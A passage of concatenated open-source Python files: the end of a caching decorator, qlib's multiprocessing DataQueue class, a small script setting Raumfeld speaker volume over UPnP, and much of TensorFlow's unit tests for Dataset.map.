"Wrapper for callable to cache arguments and return values."
key = wrapper.__cache_key__(*args, **kwargs)
pair, expire_time = cache.get(
key, default=ENOVAL, expire_time=True, retry=True,
)
if pair is not ENOVAL:
result, delta = pair
now = time.time()
ttl = expire_time - now
if (-delta * beta * math.log(random.random())) < ttl:
return result # Cache hit.
# Check whether a thread has started for early recomputation.
thread_key = key + (ENOVAL,)
thread_added = cache.add(
thread_key, None, expire=delta, retry=True,
)
if thread_added:
# Start thread for early recomputation.
def recompute():
with cache:
pair = timer(*args, **kwargs)
cache.set(
key, pair, expire=expire, tag=tag, retry=True,
)
thread = threading.Thread(target=recompute)
thread.daemon = True
thread.start()
return result
pair = timer(*args, **kwargs)
cache.set(key, pair, expire=expire, tag=tag, retry=True)
return pair[0]
def __cache_key__(*args, **kwargs):
"Make key for cache given function arguments."
return args_to_key(base, args, kwargs, typed)
wrapper.__cache_key__ = __cache_key__
return wrapper
return decorator
|
data_queue.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import os
import multiprocessing
import threading
import time
import warnings
from queue import Empty
from typing import TypeVar, Generic, Sequence, cast
from qlib.log import get_module_logger
_logger = get_module_logger(__name__)
T = TypeVar("T")
__all__ = ["DataQueue"]
class DataQueue(Generic[T]):
"""Main process (producer) produces data and stores them in a queue.
Sub-processes (consumers) can retrieve the data-points from the queue.
Data-points are generated via reading items from ``dataset``.
:class:`DataQueue` is ephemeral. You must create a new DataQueue
when the ``repeat`` is exhausted.
See the documents of :class:`qlib.rl.utils.FiniteVectorEnv` for more background.
Parameters
----------
dataset
The dataset to read data from. Must implement ``__len__`` and ``__getitem__``.
repeat
Iterate over the data-points for how many times. Use ``-1`` to iterate forever.
shuffle
If ``shuffle`` is true, the items will be read in random order.
producer_num_workers
Concurrent workers for data-loading.
queue_maxsize
Maximum items to put into queue before it jams.
Examples
--------
>>> data_queue = DataQueue(my_dataset)
>>> with data_queue:
... ...
In worker:
>>> for data in data_queue:
... print(data)
"""
def __init__(
self,
dataset: Sequence[T],
repeat: int = 1,
shuffle: bool = True,
producer_num_workers: int = 0,
queue_maxsize: int = 0,
):
if queue_maxsize == 0:
if os.cpu_count() is not None:
queue_maxsize = cast(int, os.cpu_count())
_logger.info(f"Automatically set data queue maxsize to {queue_maxsize} to avoid overwhelming.")
else:
queue_maxsize = 1
_logger.warning(f"CPU count not available. Setting queue maxsize to 1.")
self.dataset: Sequence[T] = dataset
self.repeat: int = repeat
self.shuffle: bool = shuffle
self.producer_num_workers: int = producer_num_workers
self._activated: bool = False
self._queue: multiprocessing.Queue = multiprocessing.Queue(maxsize=queue_maxsize)
self._done = multiprocessing.Value("i", 0)
def __enter__(self):
self.activate()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.cleanup()
def cleanup(self):
with self._done.get_lock():
self._done.value += 1
for repeat in range(500):
if repeat >= 1:
warnings.warn(f"After {repeat} cleanup, the queue is still not empty.", category=RuntimeWarning)
while not self._queue.empty():
try:
self._queue.get(block=False)
except Empty:
pass
# Sometimes when the queue gets emptied, more data have already been sent,
# and they are on the way into the queue.
# If these data didn't get consumed, it will jam the queue and make the process hang.
# We wait a second here for potential data arriving, and check again (for ``repeat`` times).
time.sleep(1.0)
if self._queue.empty():
break
_logger.debug(f"Remaining items in queue collection done. Empty: {self._queue.empty()}")
def get(self, block=True):
if not hasattr(self, "_first_get"):
self._first_get = True
if self._first_get:
timeout = 5.0
self._first_get = False
else:
timeout = 0.5
while True:
try:
return self._queue.get(block=block, timeout=timeout)
except Empty:
if self._done.value:
raise StopIteration # pylint: disable=raise-missing-from
def put(self, obj, block=True, timeout=None):
return self._queue.put(obj, block=block, timeout=timeout)
def mark_as_done(self):
with self._done.get_lock():
self._done.value = 1
def done(self):
return self._done.value
def activate(self):
if self._activated:
raise ValueError("DataQueue can not activate twice.")
thread = threading.Thread(target=self._producer, daemon=True)
thread.start()
self._activated = True
return self
def __del__(self):
_logger.debug(f"__del__ of {__name__}.DataQueue")
self.cleanup()
def __iter__(self):
if not self._activated:
raise ValueError(
"Need to call activate() to launch a daemon worker " "to produce data into data queue before using it."
)
return self._consumer()
def _consumer(self):
while True:
try:
yield self.get()
except StopIteration:
_logger.debug("Data consumer timed-out from get.")
return
def _producer(self):
# pytorch dataloader is used here only because we need its sampler and multi-processing
from torch.utils.data import DataLoader, Dataset # pylint: disable=import-outside-toplevel
dataloader = DataLoader(
cast(Dataset[T], self.dataset),
batch_size=None,
num_workers=self.producer_num_workers,
shuffle=self.shuffle,
collate_fn=lambda t: t, # identity collate fn
)
repeat = 10**18 if self.repeat == -1 else self.repeat
for _rep in range(repeat):
for data in dataloader:
if self._done.value:
# Already done.
return
self._queue.put(data)
_logger.debug(f"Dataloader loop done. Repeat {_rep}.")
self.mark_as_done()
|
fred.py
|
#!/usr/bin/env python3
import threading
from concurrent.futures import thread
from datetime import time
from time import sleep
from pyfeld.upnpCommand import UpnpCommand
from pyfeld.rfcmd import RfCmd
def handle_volume(roomName, value):
zoneIndex = RfCmd.get_room_zone_index(roomName)
print("Room found in zone ", zoneIndex)
if zoneIndex == -1:
print("ERROR: room with name '{0}' not found".format(roomName))
print("Available rooms are to be found here:\n" + RfCmd.get_info(False))
return
if RfCmd.is_unassigned_room(roomName):
print('error: room is unassigned: ' + roomName)
return
uc = UpnpCommand(RfCmd.rfConfig['zones'][zoneIndex]['host'])
udn = RfCmd.get_room_udn(roomName)
result = uc.set_room_volume(udn, value)
return result
uc = UpnpCommand(RfCmd.rfConfig['zones'][0]['host'])
def scan_raumfeld():
while 1:
print("discovery")
RfCmd.discover()
print("done")
sleep(120)
if __name__ == "__main__":
RfCmd.discover()
threading.Thread(target=scan_raumfeld).start()
for i in range(20):
handle_volume('one-s-serial', 20-i)
sleep(1)
|
map_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.map()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import threading
import warnings
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.experimental.ops import threading_options
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import map_fn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
def _make_coordinated_sloppy_dataset(num_elements, num_parallel_calls):
"""Produces a dataset iterator and events to control the order of elements.
Args:
num_elements: the number of input elements
num_parallel_calls: the degree of map parallelism
Returns:
A dataset iterator (represented as `get_next` op) and events that can be
used to control the order of output elements.
"""
# Set up threading events used to sequence when items are produced that
# are subsequently interleaved. These events allow us to deterministically
# simulate slowdowns and force sloppiness.
coordination_events = {i: threading.Event() for i in range(num_elements)}
def map_py_fn(x):
coordination_events[x].wait()
coordination_events[x].clear()
return x * x
def map_fn(x):
return script_ops.py_func(map_py_fn, [x], x.dtype)
options = dataset_ops.Options()
options.experimental_deterministic = False
dataset = dataset_ops.Dataset.range(num_elements).map(
map_fn, num_parallel_calls).with_options(options)
return dataset, coordination_events
@test_util.run_all_in_graph_and_eager_modes
class MapTest(test_base.DatasetTestBase, parameterized.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn).repeat(count)
self.assertEqual([c.shape[1:] for c in components],
[shape for shape in dataset.output_shapes])
return dataset
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
# Test single-threaded access to the iterator.
get_next = self.getNext(self._buildMapDataset(components, 14))
for _ in range(14):
for i in range(7):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): add eager coverage, different threads run in graph
# context.
@test_util.run_v1_only("b/120545219")
def testSkipEagerMapDatasetMultithreaded(self):
# Test multi-threaded access to the same iterator.
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
get_next = self.getNext(self._buildMapDataset(components, 18))
results = []
with self.cached_session() as sess:
def iterator_thread():
while True:
try:
results.append(sess.run(get_next()))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_parallel_calls,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components).map(
_map_fn, num_parallel_calls=num_parallel_calls).prefetch(
output_buffer_size).repeat(count)
self.assertEqual([c.shape[1:] for c in components],
[shape for shape in dataset.output_shapes])
return dataset
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
def do_test(num_parallel_calls, output_buffer_size):
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
# Test single-threaded access to the iterator.
get_next = self.getNext(
self._buildParallelMapDataset(components, 14, num_parallel_calls,
output_buffer_size))
for _ in range(14):
for i in range(7):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
for num_parallel_calls_val, output_buffer_size_val in [(1, 1), (1, 2), (2,
2),
(2, 4), (8, 8),
(8, 16)]:
do_test(num_parallel_calls_val, output_buffer_size_val)
# TODO(b/117581999): add eager coverage, different threads run in graph
# context.
@test_util.run_v1_only("b/120545219")
def testSkipEagerParallelMapDatasetMultithreaded(self):
def do_test(num_parallel_calls, output_buffer_size):
# Test multi-threaded access to the same iterator.
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
get_next = self.getNext(
self._buildParallelMapDataset(components, 18, num_parallel_calls,
output_buffer_size))
results = []
with self.cached_session() as sess:
def iterator_thread():
while True:
try:
results.append(sess.run(get_next()))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_parallel_calls_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_parallel_calls_val, output_buffer_size_val)
def testImplicitDisposeParallelMapDataset(self):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
get_next = self.getNext(dataset)
for _ in range(3):
self.evaluate(get_next())
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testCaptureIterator(self):
def _build_ds(iterator):
def _map_fn(x):
get_next = iterator.get_next()
return x * get_next
return dataset_ops.Dataset.range(10).map(_map_fn)
def _build_graph():
if context.executing_eagerly():
captured_iterator = iter(dataset_ops.Dataset.range(10))
else:
captured_iterator = dataset_ops.Dataset.range(
10).make_initializable_iterator()
ds = _build_ds(captured_iterator)
return captured_iterator, ds
captured_iter, ds = _build_graph()
if not context.executing_eagerly():
self.evaluate(captured_iter.initializer)
get_next = self.getNext(ds, requires_initialization=True)
for i in range(10):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
dataset = input_sentences.map(lambda x: string_ops.string_split([x]).values
).map(table.lookup)
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(table.initializer)
self.evaluate(get_next())
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
dataset = dataset_ops.Dataset.from_tensors(0).repeat(
-1).map(lambda _: queue.dequeue())
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(enqueue_op)
self.evaluate(close_op)
for element in elements:
self.assertEqual(element, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): Possible deadlock in eager mode, debug.
@test_util.run_v1_only("b/120545219")
def testSkipEagerCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
dataset = dataset_ops.Dataset.from_tensors(0).repeat(
-1).map(lambda _: (queue.dequeue(), queue_2.dequeue()))
self.evaluate(enqueue_op)
self.evaluate(close_op)
get_next = self.getNext(dataset, requires_initialization=True)
for i in range(100):
self.assertCountEqual([elements[i * 2], elements[i * 2 + 1]],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/121264236): add eager mode coverage when we have mutli-device setup.
@test_util.run_v1_only("b/121264236")
def testSkipEagerCaptureConstantsWithConflictingDevices(self):
config = config_pb2.ConfigProto(
device_count={"CPU": 3}, log_device_placement=True)
with self.cached_session(config=config):
with ops.device("/device:CPU:0"):
a = constant_op.constant(3.0)
with ops.device("/device:CPU:1"):
b = constant_op.constant(5.0)
def func(_):
return math_ops.add(a, b)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10).map(func)
expected_output = [8.0] * 10
self.assertDatasetProduces(dataset, expected_output=expected_output)
# TODO(b/121264236): add eager mode coverage when we have mutli-device setup.
@test_util.run_v1_only(
"defun will convert RefVariables to ResourceVariables.")
def testSkipEagerRefVariablesWithConflictingDevices(self):
config = config_pb2.ConfigProto(
device_count={"CPU": 3}, log_device_placement=True)
with self.cached_session(config=config):
def func(_):
with ops.device("/device:CPU:0"):
a = variables.VariableV1(3.0)
with ops.device("/device:CPU:1"):
b = variables.VariableV1(5.0)
return math_ops.add(a, b)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10).map(func)
self.evaluate(variables.global_variables_initializer())
expected_output = [8.0] * 10
self.assertDatasetProduces(
dataset,
expected_output=expected_output,
requires_initialization=True)
# TODO(b/121264236): add eager mode coverage when we have mutli-device setup.
@test_util.run_v1_only("b/121264236")
def testSkipEagerResourceVariablesWithConflictingDevices(self):
config = config_pb2.ConfigProto(
device_count={"CPU": 3}, log_device_placement=True)
with self.cached_session(config=config):
def func(_):
with ops.device("/device:CPU:0"):
a = variables.Variable(3.0)
with ops.device("/device:CPU:1"):
b = variables.Variable(5.0)
return math_ops.add(a, b)
# The MapDataset node ends up with two ResourceVariable inputs, one on
# device CPU:0 and the other on device CPU:1. The placer cannot resolve
# this as it cannot place the MapDatasetOp on both devices.
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10).map(func)
expected_error = (
errors.InvalidArgumentError,
"Could not colocate node with its resource and reference inputs")
self.assertDatasetProduces(
dataset, expected_error=expected_error, requires_initialization=True)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(
10).map(lambda _: counter_var.assign_add(1))
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(counter_var.initializer)
for i in range(10):
self.assertEqual(i, self.evaluate(counter_var))
self.assertEqual(i + 1, self.evaluate(get_next()))
self.assertEqual(10, self.evaluate(counter_var))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(10, self.evaluate(counter_var))
# TODO(b/117581999): error not captured for eager mode, debug.
@test_util.run_v1_only("b/120545219")
def testSkipEagerCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
dataset = dataset_ops.Dataset.from_tensors(0).repeat(
10).map(lambda _: counter_var.assign_add(1))
get_next = self.getNext(dataset, requires_initialization=True)
with self.assertRaises(errors.NotFoundError):
self.evaluate(get_next())
def testSeededStatefulOperatorIsProperlyStateful(self):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(
10).map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
get_next = self.getNext(dataset, requires_initialization=True)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(self.evaluate(get_next()))
self.assertLen(random_values, 10)
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
get_next = self.getNext(dataset, requires_initialization=True)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(self.evaluate(get_next()))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testStatefulMapKeepsStateAcrossIterators(self):
dataset = dataset_ops.Dataset.from_tensors(0).repeat(10).map(
lambda _: random_ops.random_uniform((), seed=11)).repeat(1000).batch(10)
get_next = self.getNext(dataset)
random_values = self.evaluate(get_next())
# Assert that one of the next 99 batches yielded by the iterator is
# different from the first.
i = 0
while i < 99:
if np.any(random_values != self.evaluate(get_next())):
break
i += 1
self.assertLess(i, 99)
def testStatefulOperationInShortCircuit(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
def increment_fn(x):
counter_var.assign_add(1)
return x
dataset = dataset_ops.Dataset.range(10).map(increment_fn)
get_next = self.getNext(dataset, requires_initialization=True)
self.evaluate(counter_var.initializer)
for i in range(10):
self.assertEqual(i, self.evaluate(counter_var))
self.assertEqual(i, self.evaluate(get_next()))
self.assertEqual(10, self.evaluate(counter_var))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(10, self.evaluate(counter_var))
def testMapDict(self):
dataset = dataset_ops.Dataset.range(10).map(
lambda x: {"foo": x * 2, "bar": x**2}).map(
lambda d: d["foo"] + d["bar"])
self.assertDatasetProduces(
dataset, expected_output=[i * 2 + i**2 for i in range(10)])
def testMapNamedtuple(self, count=10):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(count)
images = labels.map(lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = dataset_tuple.map(example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = dataset_tuple.map(preprocess_tuple)
dataset_namedtuple = dataset_namedtuple.map(preprocess_namedtuple)
next_tuple = self.getNext(dataset_tuple)
next_namedtuple = self.getNext(dataset_namedtuple)
# make sure both datasets contain the same data
for i in range(count):
tuple_, namedtuple_ = self.evaluate([next_tuple(), next_namedtuple()])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(next_namedtuple())
def testUseStepContainerInMap(self):
row = np.arange(6)
dataset = dataset_ops.Dataset.from_tensors(
row).map(lambda elems: map_fn.map_fn(lambda x: x * x, elems))
self.assertDatasetProduces(dataset, expected_output=[row**2])
def testCaseAndCondInMap(self):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
def defaults_two():
return control_flow_ops.cond(
math_ops.equal(math_ops.mod(x, 2), 0),
multiply,
divide,
name="cond_mult")
pred_fn_pairs = {
math_ops.logical_or(math_ops.equal(y, 2), math_ops.equal(y, 3)):
defaults_two,
}
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
def build_dataset(row, num):
dataset = dataset_ops.Dataset.from_tensor_slices(
row).map(lambda x: control_map_fn(x, num))
return self.getNext(dataset)
row = np.arange(6)
for num in [2, 3, 4]:
get_next = build_dataset(row, num)
for i in range(6):
self.assertEqual(
(i // 2 if i % 2 else i * 2) if (num == 2 or num == 3) else i * 2,
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testCaseInWhileInMap(self):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
pred_fn_pairs = {
math_ops.logical_or(math_ops.equal(y, 2), math_ops.equal(y, 3)):
divide,
}
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
def build_dataset(row, num):
# pylint: disable=g-long-lambda
dataset = dataset_ops.Dataset.from_tensors(
row).map(lambda elems: map_fn.map_fn(
lambda x: control_map_fn(x, num), elems))
return self.getNext(dataset)
row = np.arange(6)
for num in [2, 3, 4]:
get_next = build_dataset(row, num)
self.assertAllEqual(
[x // 2 if (num == 2 or num == 3) else x * 2 for x in row],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testCaseAndCondInWhileInMap(self):
def control_map_fn(x, y):
def multiply():
return x * 2
def divide():
return x // 2
def defaults_two():
return control_flow_ops.cond(
math_ops.equal(math_ops.mod(x, 2), 0),
multiply,
divide,
name="cond_mult")
pred_fn_pairs = {
math_ops.logical_or(math_ops.equal(y, 2), math_ops.equal(y, 3)):
defaults_two,
}
return control_flow_ops.case(
pred_fn_pairs, default=multiply, exclusive=True)
row = np.arange(6)
num = 2
# pylint: disable=g-long-lambda
dataset = dataset_ops.Dataset.from_tensors(
row).map(lambda elems: map_fn.map_fn(
lambda x: control_map_fn(x, num), elems))
# pylint: enable=g-long-lambda
get_next = self.getNext(dataset)
self.assertAllEqual([(x // 2 if x % 2 else x * 2) if
(num == 2 or num == 3) else x * 2 for x in row],
self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testNestedListMapDataset(self):
dataset = dataset_ops.Dataset.from_tensors(
[0, 1, 2]).repeat(10).map(lambda a: ([a[1], a[0] + a[2]], a[1]))
expected_output = [(np.array([1, 2]), 1)] * 10
self.assertDatasetProduces(dataset, expected_output=expected_output)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
def do_test(buffer_size):
dataset = dataset_ops.Dataset.range(100).map(_map_fn).prefetch(
buffer_size)
get_next = self.getNext(dataset)
# Simple test that prefetch yields the expected values in the
# expected order.
for i in range(100):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
for buffer_size in [1, 10, 100, 1000]:
do_test(buffer_size)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
def do_test_ev(buffer_size):
dataset = dataset_ops.Dataset.range(100).map(_map_fn).prefetch(
buffer_size)
get_next = self.getNext(dataset)
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, self.evaluate(get_next()))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
for buffer_size in range(1, set_event_during_invocation):
do_test_ev(buffer_size)
def testReturnList(self):
dataset = dataset_ops.Dataset.range(
10).map(lambda x: [x, constant_op.constant(37.0)])
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
dataset = dataset_ops.Dataset.range(10).map(_map_fn)
self.assertDatasetProduces(
dataset, expected_output=[(i, 37.0) for i in range(10)])
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
dataset = dataset_ops.Dataset.range(10).map(_sparse)
self.assertDatasetProduces(
dataset, expected_output=[_sparse(i) for i in range(10)])
def testSparseChain(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
dataset = dataset_ops.Dataset.range(10).map(_sparse).map(_check)
self.assertDatasetProduces(
dataset,
expected_output=[self.evaluate(_check(_sparse(i))) for i in range(10)])
def testParallelMapOutOfRangeError(self):
def raising_py_func(i):
if i == 100:
raise StopIteration()
else:
return i
dataset = dataset_ops.Dataset.range(105).map(
lambda x: script_ops.py_func(raising_py_func, [x], dtypes.int64),
num_parallel_calls=2)
get_next = self.getNext(dataset)
for i in range(100):
self.assertEqual(i, self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
def testConstantOutput(self):
dataset = dataset_ops.Dataset.range(10).map(lambda x: [x, "hello", 10])
self.assertDatasetProduces(dataset, [(i, b"hello", 10) for i in range(10)])
def testWarnOnLookupTable(self):
def collecting_function(x):
_ = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer([], []), 0.0, name="t1")
return x
warnings.simplefilter("always")
with warnings.catch_warnings(record=True) as w:
_ = dataset_ops.Dataset.range(10).map(collecting_function)
# NOTE(mrry): Python 3 prints other warnings in addition to the one we are
# testing, so we search for the expected warning.
self.assertGreaterEqual(len(w), 1)
found_warning = False
for warning in w:
if ("Creating lookup tables inside a function passed to Dataset.map() is "
